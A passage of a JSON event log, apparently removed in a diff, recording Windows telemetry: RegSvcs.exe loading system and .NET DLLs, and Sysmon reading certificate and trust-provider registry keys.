"msvcp_win.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\SysWOW64\\user32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\SysWOW64\\version.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "clr.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871050000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcr120_clr0400.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll", - "registry_value": "clr.dll", - "timestamp": 131883570871210000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "registry_value": "RegSvcs.exe", - "timestamp": 131883570871210000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "image_load", - "image_name": "mscorlib.ni.dll", - "image_path": "C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\6715dc4d04e35f16d482900c355325e9\\mscorlib.ni.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "clrjit.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "System.EnterpriseServices.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "System.EnterpriseServices.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "System.EnterpriseServices.Wrapper.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "System.EnterpriseServices.Wrapper.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "System.EnterpriseServices.Wrapper.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 